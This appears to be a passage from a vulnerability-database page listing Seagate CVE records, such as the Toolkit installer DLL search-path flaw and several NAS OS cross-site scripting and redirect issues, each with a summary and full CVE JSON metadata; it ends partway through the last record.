
    56 vulnerabilities by seagate

    CVE-2025-9267 (GCVE-0-2025-9267)

    Vulnerability from nvd – Published: 2025-09-26 12:27 – Updated: 2025-09-29 14:37
    VLAI
    Summary
    In Seagate Toolkit on Windows, a vulnerability exists in the Toolkit Installer prior to version 2.35.0.6, in which the installer attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-427 - Uncontrolled Search Path Element
    • CWE-426 - Untrusted Search Path
    Assigner
    Impacted products
    Vendor Product Version
    Seagate Toolkit Affected: 0 , < 2.35.0.6 (custom)

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2025-9267",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-09-26T12:54:52.245929Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-09-26T12:54:57.812Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          },
          {
            "providerMetadata": {
              "dateUpdated": "2025-09-29T14:37:53.583Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "https://github.com/Tiger3080/CVE-2025-9267"
              }
            ],
            "title": "CVE Program Container",
            "x_generator": {
              "engine": "ADPogram 0.0.1"
            }
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "platforms": [
                "Windows"
              ],
              "product": "Toolkit",
              "vendor": "Seagate",
              "versions": [
                {
                  "lessThan": "2.35.0.6",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cspan style=\"background-color: rgb(252, 252, 252);\"\u003eIn Seagate Toolkit on Windows a\u0026nbsp;vulnerability exists in the Toolkit Installer prior to\u0026nbsp;versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.\n\n\u003c/span\u003e\u003cbr\u003e"
                }
              ],
              "value": "In Seagate Toolkit on Windows a\u00a0vulnerability exists in the Toolkit Installer prior to\u00a0versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-471",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-471 Search Order Hijacking"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "LOCAL",
                "baseScore": 7,
                "baseSeverity": "HIGH",
                "privilegesRequired": "HIGH",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "PASSIVE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "HIGH",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-427",
                  "description": "CWE-427 Uncontrolled Search Path Element",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-426",
                  "description": "CWE-426 Untrusted Search Path",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2025-09-26T12:27:51.651Z",
            "orgId": "c6156efd-4bd0-48d7-8520-680200527478",
            "shortName": "Seagate"
          },
          "references": [
            {
              "url": "https://www.seagate.com/product-security/#security-advisories"
            },
            {
              "url": "https://www.seagate.com/support/software/toolkit/"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
        "assignerShortName": "Seagate",
        "cveId": "CVE-2025-9267",
        "datePublished": "2025-09-26T12:27:51.651Z",
        "dateReserved": "2025-08-20T14:44:11.379Z",
        "dateUpdated": "2025-09-29T14:37:53.583Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2025-9043 (GCVE-0-2025-9043)

    Vulnerability from nvd – Published: 2025-08-14 16:27 – Updated: 2025-08-21 14:16
    VLAI
    Summary
    The service executable path in Seagate Toolkit versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root directory could place a malicious Program.exe file there, which would execute with SYSTEM privileges.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-428 - Unquoted Search Path or Element
    Assigner
    Impacted products
    Vendor Product Version
    Seagate Toolkit Affected: 0 , < 2.34.0.33 (custom)

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2025-9043",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-08-14T18:42:31.162132Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-08-14T19:21:59.342Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          },
          {
            "providerMetadata": {
              "dateUpdated": "2025-08-21T14:16:46.354Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "timeline": [
              {
                "lang": "en",
                "time": "2025-08-21T14:16:46.266Z",
                "value": "Previously entered references were removed because they are not applicable to this CVE Record."
              }
            ],
            "title": "CVE Program Container",
            "x_generator": {
              "engine": "ADPogram 0.0.1"
            }
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "platforms": [
                "Windows"
              ],
              "product": "Toolkit",
              "vendor": "Seagate",
              "versions": [
                {
                  "lessThan": "2.34.0.33",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
                }
              ],
              "value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "LOCAL",
                "baseScore": 6.7,
                "baseSeverity": "MEDIUM",
                "privilegesRequired": "HIGH",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "NONE",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-428",
                  "description": "CWE-428 Unquoted Search Path or Element",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2025-08-21T14:04:46.566Z",
            "orgId": "c6156efd-4bd0-48d7-8520-680200527478",
            "shortName": "Seagate"
          },
          "references": [
            {
              "url": "https://www.seagate.com/support/software/toolkit/"
            },
            {
              "url": "https://www.seagate.com/product-security/#security-advisories"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
        "assignerShortName": "Seagate",
        "cveId": "CVE-2025-9043",
        "datePublished": "2025-08-14T16:27:05.364Z",
        "dateReserved": "2025-08-14T15:57:53.887Z",
        "dateUpdated": "2025-08-21T14:16:46.354Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-43429 (GCVE-0-2021-43429)

    Vulnerability from nvd – Published: 2022-04-07 16:52 – Updated: 2024-08-04 03:55
    VLAI
    Summary
    A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failure to release the lock pool->lock.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T03:55:28.993Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/Seagate/cortx-s3server/issues/1037"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/Seagate/cortx-s3server/pull/1041"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-04-07T16:52:25.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/Seagate/cortx-s3server/issues/1037"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/Seagate/cortx-s3server/pull/1041"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-43429",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://github.com/Seagate/cortx-s3server/issues/1037",
                  "refsource": "MISC",
                  "url": "https://github.com/Seagate/cortx-s3server/issues/1037"
                },
                {
                  "name": "https://github.com/Seagate/cortx-s3server/pull/1041",
                  "refsource": "MISC",
                  "url": "https://github.com/Seagate/cortx-s3server/pull/1041"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-43429",
        "datePublished": "2022-04-07T16:52:25.000Z",
        "dateReserved": "2021-11-08T00:00:00.000Z",
        "dateUpdated": "2024-08-04T03:55:28.993Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-12304 (GCVE-0-2018-12304)

    Vulnerability from nvd – Published: 2019-05-13 12:40 – Updated: 2024-08-05 08:30
    VLAI
    Summary
    Cross-site scripting in Application Manager in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via multiple application metadata fields: Short Description, Publisher Name, Publisher Contact, or Website URL.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:30:59.997Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting in Application Manager in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via multiple application metadata fields: Short Description, Publisher Name, Publisher Contact, or Website URL."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-05-13T12:40:24.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2018-12304",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting in Application Manager in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via multiple application metadata fields: Short Description, Publisher Name, Publisher Contact, or Website URL."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
                  "refsource": "MISC",
                  "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2018-12304",
        "datePublished": "2019-05-13T12:40:24.000Z",
        "dateReserved": "2018-06-13T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:30:59.997Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-12303 (GCVE-0-2018-12303)

    Vulnerability from nvd – Published: 2019-05-13 12:39 – Updated: 2024-08-05 08:30
    VLAI
    Summary
    Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via directory names.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:30:59.697Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via directory names."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-05-13T12:39:37.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2018-12303",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via directory names."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
                  "refsource": "MISC",
                  "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2018-12303",
        "datePublished": "2019-05-13T12:39:37.000Z",
        "dateReserved": "2018-06-13T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:30:59.697Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-12302 (GCVE-0-2018-12302)

    Vulnerability from nvd – Published: 2019-05-13 12:38 – Updated: 2024-08-05 08:30
    VLAI
    Summary
    Missing HttpOnly flag on session cookies in the Seagate NAS OS version 4.3.15.1 web application allows attackers to steal session tokens via cross-site scripting.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:30:59.775Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Missing HTTPOnly flag on session cookies in the Seagate NAS OS version 4.3.15.1 web application allows attackers to steal session tokens via cross-site scripting."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-05-13T12:38:56.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2018-12302",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Missing HTTPOnly flag on session cookies in the Seagate NAS OS version 4.3.15.1 web application allows attackers to steal session tokens via cross-site scripting."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
                  "refsource": "MISC",
                  "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2018-12302",
        "datePublished": "2019-05-13T12:38:56.000Z",
        "dateReserved": "2018-06-13T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:30:59.775Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-12301 (GCVE-0-2018-12301)

    Vulnerability from nvd – Published: 2019-05-13 12:38 – Updated: 2024-08-05 08:30
    VLAI
    Summary
    Unvalidated URL in Download Manager in Seagate NAS OS version 4.3.15.1 allows attackers to access the loopback interface via a Download URL of 127.0.0.1 or localhost.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:30:59.985Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Unvalidated URL in Download Manager in Seagate NAS OS version 4.3.15.1 allows attackers to access the loopback interface via a Download URL of 127.0.0.1 or localhost."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-05-13T12:38:07.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2018-12301",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Unvalidated URL in Download Manager in Seagate NAS OS version 4.3.15.1 allows attackers to access the loopback interface via a Download URL of 127.0.0.1 or localhost."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
                  "refsource": "MISC",
                  "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2018-12301",
        "datePublished": "2019-05-13T12:38:07.000Z",
        "dateReserved": "2018-06-13T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:30:59.985Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-12300 (GCVE-0-2018-12300)

    Vulnerability from nvd – Published: 2019-05-13 12:36 – Updated: 2024-08-05 08:30
    VLAI
    Summary
    Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:30:59.824Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the \u0027state\u0027 URL parameter."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-05-13T12:36:58.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2018-12300",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
